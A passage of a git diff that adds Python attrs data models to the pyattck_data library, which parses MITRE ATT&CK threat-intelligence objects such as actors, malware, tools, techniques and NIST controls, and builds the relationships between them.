from external data sets + names: List = field(factory=list) + #tools: List = field(factory=list) + external_tools: List = field(factory=list) + country: List = field(factory=list) + operations: List = field(factory=list) + links: List = field(factory=list) + targets: List = field(factory=list) + external_description: List = field(factory=list) + attck_id: AnyStr = field(factory=str) + comment: AnyStr = field(factory=str) + + def __attrs_post_init__(self): + if self.external_references: + return_list = [] + for item in self.external_references: + return_list.append(ExternalReferences(**item)) + self.external_references = return_list + + @property + def malwares(self): + """ + Returns all malware objects that are known to used by this actor. + + Returns: + [list[Malware]] -- A list of malware objects defined within the + Enterprise MITRE ATT&CK Framework + """ + return self._get_relationship_objects( + parent_id=self.id, + parent_type='malware' + ) + + @property + def tools(self): + """ + Returns all tool objects that are known to used by this actor. + + Returns: + [list[Tool]] -- A list of tool objects defined within the + Enterprise MITRE ATT&CK Framework + """ + return self._get_relationship_objects( + parent_id=self.id, + parent_type='tool' + ) + + @property + def techniques(self): + """ + Returns all technique objects that this actor is known to use. + + Returns: + [list[Technique]] -- A list of technique objects defined within the + Enterprise MITRE ATT&CK Framework + """ + return self._get_relationship_objects( + parent_id=self.id, + parent_type='attack-pattern' + ) diff --git a/src/pyattck_data/models/attack.py b/src/pyattck_data/models/attack.py new file mode 100644 index 0000000..7a8da82 --- /dev/null +++ b/src/pyattck_data/models/attack.py @@ -0,0 +1,73 @@ +from .types import ( + SemVersion +) +from .base import ( + List, + AnyStr, + define, + field, + BaseAttckModel, + RELATIONSHIP_MAP, + BASE_OBJECTS +) +from .actor import Actor +from .datacomponent import DataComponent +from .datasource import DataSource +from .definition import MarkingDefinition +from .identity import Identity +from .malware import Malware +from .matrix import Matrix +from .mitigation import Mitigation +from .relationship import Relationship +from .tactic import Tactic +from .technique import Technique +from .tool import Tool + + +TYPE_MAP = { + 'intrusion-set': Actor, + 'x-mitre-data-component': DataComponent, + 'x-mitre-data-source': DataSource, + 'marking-definition': MarkingDefinition, + 'identity': Identity, + 'malware': Malware, + 'x-mitre-matrix': Matrix, + 'course-of-action': Mitigation, + 'relationship': Relationship, + 'x-mitre-tactic': Tactic, + 'attack-pattern': Technique, + 'tool': Tool +} + + +@define +class MitreAttck(BaseAttckModel): + type: AnyStr = field() + spec_version: SemVersion = field() + objects: List = field() + relationship_map: dict = field(factory=dict) + + def __attrs_post_init__(self): + if self.objects: + return_list = [] + for item in self.objects: + try: + data = TYPE_MAP.get(item['type'])(**item) + return_list.append(data) + BASE_OBJECTS.append(data) + except TypeError as te: + print(item) + print(te) + raise te + if item['type'] == 'relationship' and item['relationship_type'] != 'revoked-by': + source_id = item['source_ref'] + target_id = item['target_ref'] + if source_id not in RELATIONSHIP_MAP: + RELATIONSHIP_MAP[source_id] = [] + if target_id not in RELATIONSHIP_MAP[source_id]: + RELATIONSHIP_MAP[source_id].append(target_id) + if target_id not in RELATIONSHIP_MAP: + RELATIONSHIP_MAP[target_id] = [] + if source_id not in RELATIONSHIP_MAP[target_id]: + RELATIONSHIP_MAP[target_id].append(source_id) + self.objects = return_list diff --git a/src/pyattck_data/models/base.py b/src/pyattck_data/models/base.py new file mode 100644 index 0000000..3b8dcaa --- /dev/null +++ b/src/pyattck_data/models/base.py @@ -0,0 +1,74 @@ +from datetime import datetime +from typing import ( + Any, + AnyStr, + List +) +from pydantic import ( + HttpUrl +) +from attr import ( + define, + field, + validators +) +from .types import ( + PATTERNS, + Id, + MitreRelationship, + SemVersion +) + + +BASE_OBJECTS = [] +RELATIONSHIP_MAP = {} + + +@define +class ExternalReferences: + source_name: AnyStr = field(factory=str) + url: HttpUrl = field(factory=str) + external_id: AnyStr = field(factory=str) + description: AnyStr = field(factory=str) + + +@define +class BaseAttckModel: + id: Id = field() + + +@define(eq=False) +class BaseModel(BaseAttckModel): + id: Id = field() + name: AnyStr = field() + created: datetime = field() + modified: datetime = field() + x_mitre_version: SemVersion = field() + x_mitre_domains: List = field() + + def _get_relationship_objects(self, parent_id: str, parent_type: str) -> list: + return_list = [] + if RELATIONSHIP_MAP.get(parent_id): + for item in RELATIONSHIP_MAP[parent_id]: + for x in BASE_OBJECTS: + if x.id == item and x.type == parent_type and x not in return_list: + return_list.append(x) + return return_list + + def __attrs_post_init__(self): + if self.external_references: + return_list = [] + for item in self.external_references: + return_list.append(ExternalReferences(**item)) + self.external_references = return_list + + +@define +class BaseRelationship: + id: Id = field() + type: AnyStr = field(validator=validators.in_(['relationship'])) + created: datetime = field() + modified: datetime = field() + source_ref: Id = field() + target_ref: Id = field() + relationship_type: MitreRelationship = field() diff --git a/src/pyattck_data/models/control.py b/src/pyattck_data/models/control.py new file mode 100644 index 0000000..4086670 --- /dev/null +++ b/src/pyattck_data/models/control.py @@ -0,0 +1,33 @@ +from .base import ( + BaseModel, + ExternalReferences, + Id, + List, + AnyStr, + define, + field +) + + +@define +class Control(BaseModel): + revoked: bool = field() + x_mitre_family: AnyStr = field(factory=str) + x_mitre_impact: List = field(factory=list) + x_mitre_priority: AnyStr = field(factory=str) + object_marking_refs: List[Id] = field(factory=list) + external_references: List[ExternalReferences] = field(factory=list) + + def __attrs_post_init__(self): + if self.external_references: + return_list = [] + for item in self.external_references: + return_list.append(ExternalReferences(**item)) + self.external_references = return_list + + @property + def techniques(self): + return self._get_relationship_objects( + parent_id=self.id, + parent_type='attack-pattern' + ) diff --git a/src/pyattck_data/models/datacomponent.py b/src/pyattck_data/models/datacomponent.py new file mode 100644 index 0000000..87609a2 --- /dev/null +++ b/src/pyattck_data/models/datacomponent.py @@ -0,0 +1,44 @@ +from .base import ( + BaseModel, + ExternalReferences, + List, + AnyStr, + define, + field, + validators +) +from .types import ( + Id, + SemVersion, + MitreDomain +) + + +@define +class DataComponent(BaseModel): + type: AnyStr = field(validator=validators.in_(['x-mitre-data-component'])) + description: AnyStr = field() + created_by_ref: Id = field() + x_mitre_modified_by_ref: Id = field() + x_mitre_data_source_ref: Id = field() + object_marking_refs: List[Id] = field() + x_mitre_domains: List[MitreDomain] = field(factory=list) + x_mitre_attack_spec_version: SemVersion = field(factory=SemVersion) + object_marking_refs: List[Id] = field(factory=list) + x_mitre_deprecated: bool = field(factory=bool) + revoked: bool = field(factory=bool) + external_references: List[ExternalReferences] = field(factory=list) + + def __attrs_post_init__(self): + if self.external_references: + return_list = [] + for item in self.external_references: + return_list.append(ExternalReferences(**item)) + self.external_references = return_list + + @property + def techniques(self): + return self._get_relationship_objects( + parent_id=self.id, + parent_type='attack-pattern' + ) diff --git a/src/pyattck_data/models/datasource.py b/src/pyattck_data/models/datasource.py new file mode 100644 index 0000000..3b04cf3 --- /dev/null +++ b/src/pyattck_data/models/datasource.py @@ -0,0 +1,58 @@ +from .types import ( + Id, + SemVersion, + MitreDomain, + MitrePlatform +) +from .base import ( + BaseModel, + ExternalReferences, + List, + AnyStr, + define, + field, + validators +) + + + +@define +class DataSource(BaseModel): + type: AnyStr = field(validator=validators.in_(['x-mitre-data-source'])) + description: AnyStr = field() + x_mitre_modified_by_ref: Id = field() + x_mitre_attack_spec_version: SemVersion = field() + x_mitre_collection_layers: List = field() + x_mitre_domains: List[MitreDomain] = field() + created_by_ref: Id = field() + + external_references: List[ExternalReferences] = field(factory=list) + object_marking_refs: List[Id] = field(factory=list) + aliases: List = field(factory=list) + revoked: bool = field(factory=bool) + x_mitre_deprecated: bool = field(factory=bool) + x_mitre_contributors: List = field(factory=list) + + # not used in ics-attack but used in others + x_mitre_platforms: List[MitrePlatform] = field(factory=list) + + def __attrs_post_init__(self): + if self.external_references: + return_list = [] + for item in self.external_references: + return_list.append(ExternalReferences(**item)) + self.external_references = return_list + + @property + def data_components(self): + return self._get_relationship_objects( + parent_id=self.id, + parent_type='x-mitre-data-component' + ) + + @property + def techniques(self): + return self._get_relationship_objects( + parent_id=self.id, + parent_type='attack-pattern' + ) diff --git a/src/pyattck_data/models/definition.py b/src/pyattck_data/models/definition.py new file mode 100644 index 0000000..66c661f --- /dev/null +++ b/src/pyattck_data/models/definition.py @@ -0,0 +1,34 @@ +from datetime import datetime +from attr import validators +from .types import ( + Id, + SemVersion, + PATTERNS +) +from .base import ( + ExternalReferences, + List, + AnyStr, + define, + field +) + + +@define +class Statement: + statement: AnyStr = field() + + +@define +class MarkingDefinition: + type: AnyStr = field(validator=validators.in_(['marking-definition'])) + id: Id = field() + type: AnyStr = field(validator=validators.in_(PATTERNS['types']['examples'])) + created: datetime = field() + definition: Statement = field() + definition_type: AnyStr = field() + + created_by_ref: Id = field(factory=Id) + x_mitre_attack_spec_version: SemVersion = field(factory=SemVersion) + object_marking_refs: List = field(factory=list) + external_references: List[ExternalReferences] = field(factory=list) \ No newline at end of file diff --git a/src/pyattck_data/models/generated.py b/src/pyattck_data/models/generated.py new file mode 100644 index 0000000..616915c --- /dev/null +++ b/src/pyattck_data/models/generated.py @@ -0,0 +1,299 @@ +from datetime import datetime +from hashlib import new +from typing import AnyStr, List + +from attrs import define, field +from pydantic import HttpUrl + + +@define +class Query: + product: AnyStr = field() + query: AnyStr = field() + name: AnyStr = field() + + +@define +class TechniqueCommand: + command: AnyStr = field() + source: HttpUrl = field() + name: AnyStr = field(factory=str) + + +@define +class Technique: + technique_id: AnyStr = field() + command_list: list = field(factory=list) + commands: List[TechniqueCommand] = field(factory=list) + parsed_datasets: list = field(factory=list) + queries: List[Query] = field(factory=list) + possible_detections: list = field(factory=list) + external_reference: list = field(factory=list) + + +@define +class C2Data: + name: AnyStr = field(factory=str) + license: AnyStr = field(factory=str) + price: AnyStr = field(factory=str) + github: AnyStr = field(factory=str) + site: AnyStr = field(factory=str) + twitter: AnyStr = field(factory=str) + evaluator: AnyStr = field(factory=str) + date: AnyStr = field(factory=str) + version: int = field(factory=int) + implementation: AnyStr = field(factory=str) + how_to: AnyStr = field(factory=str) + slingshot: AnyStr = field(factory=str) + kali: AnyStr = field(factory=str) + server: AnyStr = field(factory=str) + implant: AnyStr = field(factory=str) + multi_user: bool = field(factory=bool) + ui: bool = field(factory=bool) + dark_mode: bool = field(factory=bool) + api: bool = field(factory=bool) + windows: bool = field(factory=bool) + linux: bool = field(factory=bool) + macos: bool = field(factory=bool) + tcp: bool = field(factory=bool) + http: bool = field(factory=bool) + http2: bool = field(factory=bool) + http3: bool = field(factory=bool) + dns: bool = field(factory=bool) + doh: bool = field(factory=bool) + icmp: bool = field(factory=bool) + ftp: bool = field(factory=bool) + imap: bool = field(factory=bool) + mapi: bool = field(factory=bool) + smb: bool = field(factory=bool) + ldap: bool = field(factory=bool) + key_exchange: bool = field(factory=bool) + stego: bool = field(factory=bool) + proxy_aware: bool = field(factory=bool) + domainfront: bool = field(factory=bool) + custom_profile: bool = field(factory=bool) + jitter: bool = field(factory=bool) + working_hours: bool = field(factory=bool) + kill_date: bool = field(factory=bool) + chaining: bool = field(factory=bool) + logging: bool = field(factory=bool) + in_wild: bool = field(factory=bool) + attck_mapping: bool = field(factory=bool) + dashboard: bool = field(factory=bool) + blog: AnyStr = field(factory=str) + c2_matrix_indicators: AnyStr = field(factory=str) + jarm: bool = field(factory=bool) + actively_maint: bool = field(factory=bool) + slack: bool = field(factory=bool) + slack_members: bool = field(factory=bool) + gh_issues: bool = field(factory=bool) + notes: AnyStr = field(factory=str) + + +@define +class Tool: + names: list = field() + comments: AnyStr = field() + family: list = field(factory=list) + links: list = field(factory=list) + + +@define +class Actor: + country: AnyStr = field() + names: List = field() + targets: AnyStr = field() + operations: List = field() + description: AnyStr = field() + external_tools: List = field() + links: List = field() + attck_id: AnyStr = field() + comment: AnyStr = field() + + +@define +class GeneratedData: + last_updated: datetime = field() + techniques: List[Technique] = field(factory=list) + c2_data: List[C2Data] = field(factory=list) + tools: List[Tool] = field(factory=list) + actors: List[Actor] = field(factory=list) + + @last_updated.default + def default_updated(self): + return str(datetime.now()) + + def add_actor_item(self, country, names, targets, operations, description, tools, links, attck_id, comment): + self.actors.append( + Actor( + country=country, + names=list(set(names)) if names else [], + targets=list(set(targets)) if targets else [], + operations=list(set(operations)) if operations else [], + description=description, + external_tools=list(set(tools)) if tools else [], + links=list(set(links)) if links else [], + attck_id=attck_id, + comment=comment + ) + ) + + def add_tool_item(self, names, comments, family, links): + tool = Tool( + names=list(set(names)), + comments=comments, + family=family, + links=list(set(links)) + ) + if self.tools: + if tool not in self.tools: + self.tools.append(tool) + else: + self.tools.append(tool) + + def add_command(self, technique_id, source, name, command): + c = TechniqueCommand( + command=command, + source=source, + name=name + ) + if self.techniques: + found = False + for technique in self.techniques: + if technique.technique_id == technique_id: + found = True + if technique.commands: + if c not in technique.commands: + technique.commands.append(c) + else: + technique.commands.append(c) + + if technique.command_list: + if command not in technique.command_list: + technique.command_list.append(command) + else: + technique.command_list.append(command) + if not found: + self.techniques.append( + Technique( + technique_id=technique_id, + commands=[c], + command_list=[command] + ) + ) + else: + self.techniques.append( + Technique( + technique_id=technique_id, + commands=[c], + command_list=[command] + ) + ) + + def add_dataset(self, technique_id, content): + if self.techniques: + found = False + for technique in self.techniques: + if technique.technique_id == technique_id: + found = True + technique.parsed_datasets.append(content) + if not found: + self.techniques.append( + Technique( + technique_id=technique_id, + parsed_datasets=[content] + ) + ) + else: + self.techniques.append( + Technique( + technique_id=technique_id, + parsed_datasets=[content] + ) + ) + + def add_possible_queries(self, technique_id, product, content, name): + q = Query( + product=product, + query=content, + name=name + ) + if self.techniques: + found = False + for technique in self.techniques: + if technique.technique_id == technique_id: + found = True + technique.queries.append(q) + if not found: + self.techniques.append( + Technique( + technique_id=technique_id, + queries=[q] + ) + ) + else: + self.techniques.append( + Technique( + technique_id=technique_id, + queries=[q] + ) + ) + + def add_possible_detection(self, technique_id, data): + if self.techniques: + found = False + for technique in self.techniques: + if technique.technique_id == technique_id: + found = True + technique.possible_detections.append(data) + if not found: + self.techniques.append( + Technique( + technique_id=technique_id, + possible_detections=[data] + ) + ) + else: + self.techniques.append( + Technique( + technique_id=technique_id, + possible_detections=[data] + ) + ) + + def add_external_reference(self, technique_id, reference): + if self.techniques: + found = False + for technique in self.techniques: + if technique.technique_id == technique_id: + found = True + if reference not in technique.external_reference: + technique.external_reference.append(reference) + if not found: + self.techniques.append( + Technique( + technique_id=technique_id, + external_reference=[reference] + ) + ) + else: + self.techniques.append( + Technique( + technique_id=technique_id, + external_reference=[reference] + ) + ) + + def add_c2_data(self, data): + if isinstance(data, dict): + new_dict = {} + for key, val in data.items(): + if key == 'Actively Maint. <12 mo': + new_dict['actively_maint'] = val + elif key == 'att&ck_mapping': + new_dict['attck_mapping'] = val + else: + new_dict[key.replace(' ','_').replace('-', '_').replace('&','').lower()] = val + data = C2Data(**new_dict) + if data not in self.c2_data: + self.c2_data.append(data) diff --git a/src/pyattck_data/models/identity.py b/src/pyattck_data/models/identity.py new file mode 100644 index 0000000..11518c1 --- /dev/null +++ b/src/pyattck_data/models/identity.py @@ -0,0 +1,26 @@ +from datetime import datetime +from attr import validators +from .types import ( + Id +) +from .base import ( + ExternalReferences, + List, + AnyStr, + define, + field +) + + +@define +class Identity: + id: Id = field() + type: AnyStr = field(validator=validators.in_(['identity'])) + identity_class: AnyStr = field() + created: datetime = field() + modified: datetime = field() + name: AnyStr = field() + object_marking_refs: List[Id] = field() + roles: List = field(factory=list) + sectors: List = field(factory=list) + external_references: List[ExternalReferences] = field(factory=list) diff --git a/src/pyattck_data/models/malware.py b/src/pyattck_data/models/malware.py new file mode 100644 index 0000000..ed9a09d --- /dev/null +++ b/src/pyattck_data/models/malware.py @@ -0,0 +1,123 @@ +from .types import ( + Id, + SemVersion, + MitreDomain, + MitrePlatform +) +from .base import ( + BaseModel, + ExternalReferences, + List, + AnyStr, + define, + field, + validators +) + + +@define +class Malware(BaseModel): + type: AnyStr = field(validator=validators.in_(['malware'])) + labels: List = field() + description: AnyStr = field() + + external_references: List[ExternalReferences] = field(factory=list) + object_marking_refs: List[Id] = field(factory=list) + revoked: bool = field(factory=bool) + created_by_ref: Id = field(factory=Id) + x_mitre_deprecated: bool = field(factory=bool) + x_mitre_contributors: List = field(factory=list) + x_mitre_aliases: List = field(factory=list) + x_mitre_platforms: List[MitrePlatform] = field(factory=list) + + # external collected data attributes below + names: List = field(factory=list) + comments: List = field(factory=list) + family: List = field(factory=list) + links: List = field(factory=list) + license: AnyStr = field(factory=str) + price: AnyStr = field(factory=str) + github: AnyStr = field(factory=str) + site: AnyStr = field(factory=str) + twitter: AnyStr = field(factory=str) + evaluator: AnyStr = field(factory=str) + date: AnyStr = field(factory=str) + version: int = field(factory=int) + implementation: AnyStr = field(factory=str) + how_to: AnyStr = field(factory=str) + slingshot: AnyStr = field(factory=str) + kali: AnyStr = field(factory=str) + server: AnyStr = field(factory=str) + implant: AnyStr = field(factory=str) + multi_user: bool = field(factory=bool) + ui: bool = field(factory=bool) + dark_mode: bool = field(factory=bool) + api: bool = field(factory=bool) + windows: bool = field(factory=bool) + linux: bool = field(factory=bool) + macos: bool = field(factory=bool) + tcp: bool = field(factory=bool) + http: bool = field(factory=bool) + http2: bool = field(factory=bool) + http3: bool = field(factory=bool) + dns: bool = field(factory=bool) + doh: bool = field(factory=bool) + icmp: bool = field(factory=bool) + ftp: bool = field(factory=bool) + imap: bool = field(factory=bool) + mapi: bool = field(factory=bool) + smb: bool = field(factory=bool) + ldap: bool = field(factory=bool) + key_exchange: bool = field(factory=bool) + stego: bool = field(factory=bool) + proxy_aware: bool = field(factory=bool) + domainfront: bool = field(factory=bool) + custom_profile: bool = field(factory=bool) + jitter: bool = field(factory=bool) + working_hours: bool = field(factory=bool) + kill_date: bool = field(factory=bool) + chaining: bool = field(factory=bool) + logging: bool = field(factory=bool) + in_wild: bool = field(factory=bool) + attck_mapping: bool = field(factory=bool) + dashboard: bool = field(factory=bool) + blog: AnyStr = field(factory=str) + c2_matrix_indicators: AnyStr = field(factory=str) + jarm: bool = field(factory=bool) + actively_maint: bool = field(factory=bool) + slack: bool = field(factory=bool) + slack_members: bool = field(factory=bool) + gh_issues: bool = field(factory=bool) + notes: AnyStr = field(factory=str) + + # used in mobile attack + x_mitre_old_attack_id: AnyStr = field(factory=str) + + # NOT used in mobile attack + x_mitre_attack_spec_version: SemVersion = field(factory=SemVersion) + x_mitre_modified_by_ref: Id = field(factory=Id) + x_mitre_domains: List[MitreDomain] = field(factory=list) + + # used in ICS attack + is_family: bool = field(factory=bool) + + def __attrs_post_init__(self): + if self.external_references: + return_list = [] + for item in self.external_references: + return_list.append(ExternalReferences(**item)) + self.external_references = return_list + + @property + def actors(self): + return self._get_relationship_objects( + parent_id=self.id, + parent_type='intrusion-set' + ) + + @property + def techniques(self): + return self._get_relationship_objects( + parent_id=self.id, + parent_type='attack-pattern' + ) diff --git a/src/pyattck_data/models/matrix.py b/src/pyattck_data/models/matrix.py new file mode 100644 index 0000000..adc5d4b --- /dev/null +++ b/src/pyattck_data/models/matrix.py @@ -0,0 +1,33 @@ +from .types import ( + Id, + SemVersion, + MitreDomain +) +from .base import ( + BaseModel, + ExternalReferences, + List, + AnyStr, + define, + field, + validators +) + + +@define +class Matrix(BaseModel): + type: AnyStr = field(validator=validators.in_(['x-mitre-matrix'])) + tactic_refs: List[Id] = field() + created_by_ref: Id = field() + description: AnyStr = field() + x_mitre_domains: List[MitreDomain] = field(factory=list) + object_marking_refs: List[Id] = field(factory=list) + external_references: List[ExternalReferences] = field(factory=list) + + # used in pre-attack + x_mitre_deprecated: bool = field(factory=bool) + + # NOT used in pre-attack + x_mitre_version: SemVersion = field(factory=SemVersion) + x_mitre_modified_by_ref: Id = field(factory=Id) + x_mitre_attack_spec_version: SemVersion = field(factory=SemVersion) diff --git a/src/pyattck_data/models/mitigation.py b/src/pyattck_data/models/mitigation.py new file mode 100644 index 0000000..248bd9b --- /dev/null +++ b/src/pyattck_data/models/mitigation.py @@ -0,0 +1,49 @@ +from .types import ( + Id, + MitreDomain +) +from .base import ( + BaseModel, + ExternalReferences, + List, + AnyStr, + SemVersion, + define, + field, + validators +) + + +@define +class Mitigation(BaseModel): + type: AnyStr = field(validator=validators.in_(['course-of-action'])) + description: AnyStr = field() + created_by_ref: Id = field() + x_mitre_deprecated: bool = field(factory=bool) + object_marking_refs: List[Id] = field(factory=list) + external_references: List[ExternalReferences] = field(factory=list) + + # used in ics-attack + labels: List = field(factory=list) + x_mitre_attack_spec_version: SemVersion = field(factory=SemVersion) + + # used in mobile attack + x_mitre_old_attack_id: AnyStr = field(factory=str) + + # NOT used in mobile attack + x_mitre_modified_by_ref: Id = field(factory=Id) + x_mitre_domains: List[MitreDomain] = field(factory=list) + + def __attrs_post_init__(self): + if self.external_references: + return_list = [] + for item in self.external_references: + return_list.append(ExternalReferences(**item)) + self.external_references = return_list + + @property + def techniques(self): + return self._get_relationship_objects( + parent_id=self.id, + parent_type='attack-pattern' + ) diff --git a/src/pyattck_data/models/nist.py b/src/pyattck_data/models/nist.py new file mode 100644 index 0000000..59e8b9c --- /dev/null +++ b/src/pyattck_data/models/nist.py @@ -0,0 +1,74 @@ +from datetime import datetime + +from attrs import validators + +from .types import Id, SemVersion +from .base import ( + List, + AnyStr, + BaseRelationship, + define, + field, + ExternalReferences +) + + +@define +class ControlObject: + id: Id = field() + name: AnyStr = field() + created: datetime = field() + external_references: List[ExternalReferences] = field() + modified: datetime = field() + description: AnyStr = field() + type: AnyStr = field(validator=validators.in_(['course-of-action'])) + x_mitre_family: AnyStr = field() + x_mitre_priority: AnyStr = field(factory=str) + x_mitre_impact: list = field(factory=list) + + +@define +class NistControls: + id: Id = field() + type: Id = field() + objects: List[ControlObject] = field(factory=list) + spec_version: SemVersion = field(factory=SemVersion) + + def __attrs_post_init__(self): + if self.objects: + return_list = [] + for item in self.objects: + if item.get('type') == 'relationship': + try: + return_list.append(BaseRelationship(**item)) + except Exception as e: + raise e + else: + try: + return_list.append(ControlObject(**item)) + except Exception as e: + print(item) + raise e + self.objects = return_list + +@define +class GeneratedNistControlMap: + data: dict = field() + + def __attrs_post_init__(self): + if self.data: + return_dict = {} + for key,val in self.data.items(): + try: + Id().validate(key) + except Exception as e: + raise e + return_dict[key] = [] + if isinstance(val, list): + for item in val: + try: + Id().validate(item) + except Exception as e: + raise e + return_dict[key] = val + self.data = return_dict diff --git a/src/pyattck_data/models/py.typed b/src/pyattck_data/models/py.typed new file mode 100644 index 0000000..e69de29 diff --git a/src/pyattck_data/models/relationship.py b/src/pyattck_data/models/relationship.py new file mode 100644 index 0000000..64ed823 --- /dev/null +++ b/src/pyattck_data/models/relationship.py @@ -0,0 +1,27 @@ +from .types import ( + Id, + SemVersion +) +from .base import ( + BaseRelationship, + ExternalReferences, + List, + AnyStr, + define, + field +) + + +@define +class Relationship(BaseRelationship): + object_marking_refs: List[Id] = field() + revoked: bool = field(factory=bool) + created_by_ref: Id = field(factory=Id) + description: AnyStr = field(factory=str) + x_mitre_deprecated: bool = field(factory=bool) + x_mitre_version: SemVersion = field(factory=SemVersion) + x_mitre_attack_spec_version: SemVersion = field(factory=SemVersion) + external_references: List[ExternalReferences] = field(factory=list) + + # NOT used by pre-attack + x_mitre_modified_by_ref: Id = field(factory=Id) diff --git a/src/pyattck_data/models/tactic.py b/src/pyattck_data/models/tactic.py new file mode 100644 index 0000000..429d414 --- /dev/null +++ b/src/pyattck_data/models/tactic.py @@ -0,0 +1,53 @@ +from math import factorial +from .types import ( + Id, + SemVersion +) +from .base import ( + BASE_OBJECTS, + BaseModel, + ExternalReferences, + List, + AnyStr, + define, + field, + validators +) + + +@define +class Tactic(BaseModel): + type: AnyStr = field(validator=validators.in_(['x-mitre-tactic'])) + description: AnyStr = field() + created_by_ref: Id = field() + x_mitre_shortname: AnyStr = field() + object_marking_refs: List[Id] = field(factory=list) + external_references: List[ExternalReferences] = field(factory=list) + x_mitre_contributors: List = field(factory=list) + + # used in ics-attack + x_mitre_deprecated: bool = field(factory=bool) + revoked: bool = field(factory=bool) + + # NOT used in pre-attack + x_mitre_version: SemVersion = field(factory=SemVersion) + x_mitre_domains: List = field(factory=list) + x_mitre_modified_by_ref: Id = field(factory=Id) + x_mitre_attack_spec_version: SemVersion = field(factory=SemVersion) + + def __attrs_post_init__(self): + if self.external_references: + return_list = [] + for item in self.external_references: + return_list.append(ExternalReferences(**item)) + self.external_references = return_list + + @property + def techniques(self): + return_list = [] + for object in BASE_OBJECTS: + if hasattr(object, 'kill_chain_phases'): + for prop in object.kill_chain_phases: + if prop.phase_name.lower() == self.x_mitre_shortname.lower(): + return_list.append(object) + return return_list diff --git a/src/pyattck_data/models/technique.py b/src/pyattck_data/models/technique.py new file mode 100644 index 0000000..7e8ee96 --- /dev/null +++ b/src/pyattck_data/models/technique.py @@ -0,0 +1,156 @@ +from .types import ( + Id, + SemVersion, + MitreDomain, + MitrePlatform +) +from .base import ( + BaseModel, + ExternalReferences, + List, + AnyStr, + define, + field, + validators +) + + +@define +class Command: + source: AnyStr = field(factory=str) + command: AnyStr = field(factory=str) + name: AnyStr = field(factory=str) + + +@define +class KillChainPhases: + kill_chain_name: AnyStr = field() + phase_name: AnyStr = field() + + +@define +class Technique(BaseModel): + type: AnyStr = field(validator=validators.in_(['attack-pattern'])) + + x_mitre_data_sources: List = field(factory=list) + x_mitre_contributors: List = field(factory=list) + x_mitre_impact_type: List = field(factory=list) + x_mitre_deprecated: bool = field(factory=bool) + x_mitre_effective_permissions: List = field(factory=list) + x_mitre_remote_support: bool = field(factory=bool) + x_mitre_permissions_required: List = field(factory=list) + x_mitre_is_subtechnique: bool = field(factory=bool) + x_mitre_detection: AnyStr = field(factory=str) + x_mitre_defense_bypassed: List = field(factory=list) + x_mitre_system_requirements: List = field(factory=list) + x_mitre_attack_spec_version: SemVersion = field(factory=SemVersion) + revoked: bool = field(factory=bool) + object_marking_refs: List[Id] = field(factory=list) + external_references: List[ExternalReferences] = field(factory=list) + + # used in pre-attack + x_mitre_detectable_by_common_defenses: AnyStr = field(factory=str) + x_mitre_detectable_by_common_defenses_explanation: AnyStr = field(factory=str) + x_mitre_difficulty_for_adversary: AnyStr = field(factory=str) + x_mitre_difficulty_for_adversary_explanation: AnyStr = field(factory=str) + x_mitre_old_attack_id: AnyStr = field(factory=str) + + # these are NOT used by pre-attack but used by other frameworks + x_mitre_modified_by_ref: Id = field(factory=Id) + x_mitre_platforms: List[MitrePlatform] = field(factory=list) + x_mitre_domains: List[MitreDomain] = field(factory=list) + + # used in mobile framework + x_mitre_tactic_type: List = field(factory=list) + + # NOT used in mobile framework + x_mitre_version: SemVersion = field(factory=SemVersion) + description: AnyStr = field(factory=str) + created_by_ref: Id = field(factory=Id) + kill_chain_phases: List[KillChainPhases] = field(factory=list) + + command_list: List = field(factory=list) + commands: List[Command] = field(factory=list) # need to define this object better + queries: List = field(factory=list) # need to define this object better + parsed_datasets: List = field(factory=list) # need to define this object better + possible_detections: List = field(factory=list) # need to define this object better + external_reference: List = field(factory=list) + + controls: List = field(factory=list) + + @property + def actors(self): + return self._get_relationship_objects( + parent_id=self.id, + parent_type='intrusion-set' + ) + + @property + def data_components(self): + return self._get_relationship_objects( + parent_id=self.id, + parent_type='x-mitre-data-component' + ) + + @property + def data_sources(self): + return self._get_relationship_objects( + parent_id=self.id, + parent_type='x-mitre-data-source' + ) + + @property + def malwares(self): + return self._get_relationship_objects( + parent_id=self.id, + parent_type='malware' + ) + + @property + def mitigations(self): + return self._get_relationship_objects( + parent_id=self.id, + parent_type='course-of-action' + ) + + @property + def tactics(self): + return self._get_relationship_objects( + parent_id=self.id, + parent_type='x-mitre-tactic' + ) + + @property + def techniques(self): + return self._get_relationship_objects( + parent_id=self.id, + parent_type='attack-pattern' + ) + + @property + def tools(self): + return self._get_relationship_objects( + parent_id=self.id, + parent_type='tool' + ) + + def __attrs_post_init__(self): + if self.controls: + from .control import Control + return_list = [] + for item in self.controls: + try: + return_list.append(Control(**item)) + except ValueError as ve: + raise ve + self.controls = return_list + if self.external_references: + return_list = [] + for item in self.external_references: + return_list.append(ExternalReferences(**item)) + self.external_references = return_list + if self.kill_chain_phases: + return_list = [] + for item in self.kill_chain_phases: + return_list.append(KillChainPhases(**item)) + self.kill_chain_phases = return_list diff --git a/src/pyattck_data/models/tool.py b/src/pyattck_data/models/tool.py new file mode 100644 index 0000000..3029d9a --- /dev/null +++ b/src/pyattck_data/models/tool.py @@ -0,0 +1,125 @@ +from .types import ( + Id, + SemVersion, + MitreDomain, + MitrePlatform +) +from .base import ( + BaseModel, + ExternalReferences, + List, + AnyStr, + define, + field, + validators +) + + +@define +class Tool(BaseModel): + type: AnyStr = field(validator=validators.in_(['tool'])) + description: AnyStr = field() + created_by_ref: Id = field() + labels: List = field() + + x_mitre_platforms: List[MitrePlatform] = field(factory=list) + x_mitre_aliases: List = field(factory=list) + x_mitre_contributors: List = field(factory=list) + external_references: List[ExternalReferences] = field(factory=list) + object_marking_refs: List[Id] = field(factory=list) + revoked: bool = field(factory=bool) + x_mitre_deprecated: bool = field(factory=bool) + + # External collected data properties (if applicable) + c2_data: dict = field(factory=dict) + external_dataset: List = field(factory=list) # need to define this object better + additional_names: List = field(factory=list) + attribution_links: List = field(factory=list) + additional_comments: List = field(factory=list) + names: List = field(factory=list) + comments: List = field(factory=list) + family: List = field(factory=list) + links: List = field(factory=list) + license: AnyStr = field(factory=str) + price: AnyStr = field(factory=str) + github: AnyStr = field(factory=str) + site: AnyStr = field(factory=str) + twitter: AnyStr = field(factory=str) + evaluator: AnyStr = field(factory=str) + date: AnyStr = field(factory=str) + version: int = field(factory=int) + implementation: AnyStr = field(factory=str) + how_to: AnyStr = field(factory=str) + slingshot: AnyStr = field(factory=str) + kali: AnyStr = field(factory=str) + server: AnyStr = field(factory=str) + implant: AnyStr = field(factory=str) + multi_user: bool = field(factory=bool) + ui: bool = field(factory=bool) + dark_mode: bool = field(factory=bool) + api: bool = 